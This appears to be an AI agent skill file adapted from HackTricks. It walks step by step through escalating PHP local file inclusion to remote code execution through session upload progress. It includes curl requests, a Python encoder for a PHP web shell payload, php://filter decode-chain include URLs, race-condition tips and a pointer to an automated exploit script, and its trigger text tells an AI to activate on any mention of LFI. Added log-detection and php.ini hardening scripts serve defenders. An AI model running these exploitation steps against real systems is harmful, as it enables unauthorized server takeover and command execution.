Hacktricks-skills lfi-php-session-exploit

Exploit Local File Inclusion (LFI) vulnerabilities using PHP session upload progress to achieve Remote Code Execution (RCE). Use this skill whenever the user mentions LFI, file inclusion vulnerabilities, PHP sessions, session upload progress, or needs to escalate an LFI to RCE. Also trigger when users are working on CTF challenges, penetration testing web applications, or analyzing PHP-based vulnerabilities involving session manipulation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/via-php_session_upload_progress/SKILL.MD
source content

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

This skill helps you exploit Local File Inclusion vulnerabilities by leveraging PHP's session.upload_progress feature to achieve Remote Code Execution (RCE).

When to Use This Skill

Use this technique when:

  • You've identified an LFI vulnerability in a PHP application
  • You have no active session and session.auto_start is Off (the technique works anyway)
  • session.upload_progress.enabled is On (the PHP default)
  • You need to escalate LFI to RCE
  • You're working on CTF challenges or authorized penetration testing

Vulnerability Overview

PHP's session.upload_progress feature allows tracking of file uploads. When you provide a PHP_SESSION_UPLOAD_PROGRESS field in multipart POST data, PHP automatically starts a session for you, even if the session ID you send in the cookie was never issued by the server. This creates an opportunity to:

  1. Control session data - You can inject arbitrary content into the session file
  2. Include your payload - If the application includes session files, you can include your controlled content
  3. Achieve RCE - By injecting PHP shellcode into the session

The Race Condition Challenge

Important: The default session.upload_progress.cleanup setting is On, meaning the upload progress data is cleaned as soon as possible. This creates a race condition: you must include the session file before PHP cleans it.

The Prefix Problem

By default, PHP session files created via upload progress start with the prefix upload_progress_. This means your session file will look like:

upload_progress_controlledcontentbyattacker

To remove this prefix and control the beginning of the file, use the base64 encoding trick:

  1. Base64 encode your payload 3 times
  2. Use the convert.base64-decode filter 3 times when including
  3. PHP removes the prefix characters during decoding
  4. Only your payload remains at the start

Exploitation Steps

Step 1: Verify the Vulnerability

Test if the target is vulnerable:

# Check if session is created with PHP_SESSION_UPLOAD_PROGRESS
curl http://target/ -H 'Cookie: PHPSESSID=test123' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah' -F 'file=@/etc/passwd'

# On the server, check if session file was created
ls -la /var/lib/php/sessions/
# Look for: sess_test123

Step 2: Craft the Payload

Create a payload that will survive the base64 encoding/decoding process:

import base64
import sys

# Your PHP shellcode
payload = "<?php system($_GET['cmd']); ?>"

# Encode 3 times to remove the prefix
encoded = base64.b64encode(payload.encode()).decode()
encoded = base64.b64encode(encoded.encode()).decode()
encoded = base64.b64encode(encoded.encode()).decode()

print(encoded)

Step 3: Trigger the Race Condition

Send the multipart POST with your encoded payload:

curl -X POST http://target/vulnerable.php \
  -F "PHP_SESSION_UPLOAD_PROGRESS=<YOUR_BASE64_PAYLOAD>" \
  -F "file=@/etc/passwd"

Step 4: Include the Session File

Use the LFI to include your session with the decode filters:

# Include with 3x base64 decode filters
curl "http://target/vulnerable.php?file=php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=/var/lib/php/sessions/sess_<SESSION_ID>"

Step 5: Execute Commands

If successful, your shell will be active:

curl "http://target/vulnerable.php?file=php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=/var/lib/php/sessions/sess_<SESSION_ID>&cmd=id"
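From the defender's side, the include requests in steps 4 and 5 leave a distinctive trace in the web server's access log: a php://filter wrapper, a chain of convert.base64-decode filters, and a resource path ending in a sess_ file, often followed by a second request that adds the parameter the injected code reads. The multipart POST from step 3 is not visible in access logs (the PHP_SESSION_UPLOAD_PROGRESS field lives in the request body), so body inspection at a WAF or in application logging is needed to catch that half. The script below is an added example, not part of the original skill or of HackTricks; it scans constructed combined-format log lines (sample data, not real traffic) and returns one finding per suspicious request, including a plain traversal attempt for comparison.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format access log lines for illustration; not real traffic.
# Lines 3 and 4 mirror the include requests from steps 4 and 5 (once percent-encoded,
# once raw); line 5 is a plain traversal attempt for comparison.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "POST /vulnerable.php HTTP/1.1" 200 88 "-" "curl/8.1.2"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /vulnerable.php?file=php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fconvert.base64-decode%2Fconvert.base64-decode%2Fresource%3D%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_test123 HTTP/1.1" 200 1024 "-" "curl/8.1.2"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /vulnerable.php?file=php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=/var/lib/php/sessions/sess_test123&cmd=id HTTP/1.1" 200 96 "-" "curl/8.1.2"
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /vulnerable.php?file=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "python-requests/2.31"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# PHP session file names are "sess_" followed by the session ID alphabet [a-zA-Z0-9,-].
SESSION_FILE_RE = re.compile(r"/sess_[a-z0-9,-]+")


def indicators_for(value: str) -> tuple[set, int]:
    """Return (indicator names, number of base64-decode filters) for one parameter value."""
    v = unquote(value).lower()  # parse_qs decoded once already; this catches double encoding
    found = set()
    if "php://" in v:
        found.add("php_wrapper")
    decodes = v.count("convert.base64-decode")
    if decodes:
        found.add("base64_decode_filter")
    if SESSION_FILE_RE.search(v):
        found.add("session_file_include")
    if "../" in v or "..\\" in v:
        found.add("path_traversal")
    return found, decodes


def analyze_log(text: str) -> list[dict]:
    """Scan access log lines and return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        indicators, chain, flagged = set(), 0, []
        for name, values in params.items():
            for value in values:
                found, decodes = indicators_for(value)
                if found:
                    flagged.append(name)
                indicators |= found
                chain = max(chain, decodes)
        # Extra parameters next to a session-file include are where injected code
        # usually reads its arguments (the page's own example uses cmd=).
        if "session_file_include" in indicators and set(params) - set(flagged):
            indicators.add("payload_args")
        if indicators:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "status": m["status"],
                "target": m["target"], "indicators": indicators, "decode_chain": chain,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["time"], f["ip"], sorted(f["indicators"]), "decode_chain=%d" % f["decode_chain"])
```

The decode_chain count is the useful triage field: legitimate applications rarely stack php://filter decoders at all, and a chain of three against a sess_ path matches this technique specifically, so it can be alerted on at a much lower false-positive rate than a generic "../" rule.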

Complete Exploit Script

Use the bundled script exploit-php-session-lfi.py for automated exploitation. It handles:

  • Payload encoding
  • Race condition timing
  • Session file location detection
  • Command execution

Common Session File Locations

PHP session files are typically stored in:

  • /var/lib/php/sessions/
  • /var/lib/php5/sessions/
  • /tmp/
  • /var/tmp/
  • /dev/shm/

Check session.save_path in phpinfo() output if available.
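Checking session.save_path is one instance of a broader review: the technique depends on a handful of php.ini directives, and each has a value that closes it off. The script below is an added example, not code from the skill or from HackTricks. It parses a constructed php.ini excerpt that carries the stock values this technique relies on, reports the directives a defender should change, and checks a hardened counterpart (paths in both are hypothetical) to confirm it produces no findings. Disabling session.upload_progress removes the cookie-less session write entirely; fixing the file inclusion itself remains the root cause to address.

```python
# Constructed php.ini excerpt with the stock settings the technique relies on;
# not taken from any real host.
WEAK_PHP_INI = """\
[PHP]
allow_url_include = Off
open_basedir =
; sessions live at a path every attacker will try first
[Session]
session.save_path = "/var/lib/php/sessions"
session.auto_start = 0
session.upload_progress.enabled = On
session.upload_progress.cleanup = On
session.upload_progress.prefix = "upload_progress_"
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
"""

# The same directives with the values this audit recommends (hypothetical paths).
HARDENED_PHP_INI = """\
[PHP]
allow_url_include = Off
open_basedir = "/var/www/app:/tmp"
[Session]
session.save_path = "/var/www/app-sessions"
session.upload_progress.enabled = Off
session.upload_progress.cleanup = On
"""

# The well-known locations listed above, which can be guessed without phpinfo().
PREDICTABLE_SAVE_PATHS = {
    "/var/lib/php/sessions", "/var/lib/php5/sessions", "/tmp", "/var/tmp", "/dev/shm",
}


def php_bool(value: str) -> bool:
    """Interpret a php.ini truth value the way PHP does (On/1/true/yes are true)."""
    return value.strip().lower() in {"1", "on", "true", "yes"}


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini parser: full-line ';' comments and [sections] are skipped,
    keys are lower-cased, surrounding quotes are stripped. Inline comments are
    not handled, so the "N;/path" save_path syntax survives intact."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "[")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"').strip("'")
    return settings


def audit_session_settings(ini: dict) -> list[dict]:
    """Return one finding per directive whose value leaves this technique open.
    Missing directives are evaluated at PHP's documented defaults."""
    findings = []

    def flag(directive: str, recommendation: str) -> None:
        findings.append({"directive": directive,
                         "current": ini.get(directive, "<unset>"),
                         "recommendation": recommendation})

    if php_bool(ini.get("session.upload_progress.enabled", "On")):
        flag("session.upload_progress.enabled",
             "Set Off unless the application reads upload progress from $_SESSION; "
             "this removes the session write that needs no prior session.")
    if not php_bool(ini.get("session.upload_progress.cleanup", "On")):
        flag("session.upload_progress.cleanup",
             "Set On; with cleanup Off the injected data persists and no race is needed.")
    if php_bool(ini.get("allow_url_include", "Off")):
        flag("allow_url_include", "Set Off; remote includes make any LFI trivially exploitable.")
    if not ini.get("open_basedir"):
        flag("open_basedir",
             "Restrict PHP file access to the application tree so an include cannot reach arbitrary paths.")
    save_path = ini.get("session.save_path", "").rstrip("/").split(";")[-1]
    if save_path in PREDICTABLE_SAVE_PATHS:
        flag("session.save_path",
             "Use an application-specific directory; the default locations are guessed first.")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_PHP_INI), ("hardened", HARDENED_PHP_INI)):
        print(label)
        for f in audit_session_settings(parse_php_ini(text)):
            print("  %s = %r: %s" % (f["directive"], f["current"], f["recommendation"]))
```

The same checks can be run against a live host by feeding it the output of `php -i` (after normalising its "directive => local => master" lines to key=value) or the relevant phpinfo() rows, which is the situation the page's advice about session.save_path has in mind.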

Detection and Evasion

Signs the Target is Vulnerable

  • PHP application with file inclusion
  • session.upload_progress.enabled is On (default)
  • LFI vulnerability confirmed
  • Session files are world-readable

Bypass Techniques

  • Try different session paths
  • Use multiple concurrent requests to increase race condition success rate
  • Adjust timing between upload and include requests

Legal Notice

This skill is for authorized security testing and CTF challenges only. Always obtain proper authorization before testing any system. Unauthorized exploitation of vulnerabilities is illegal.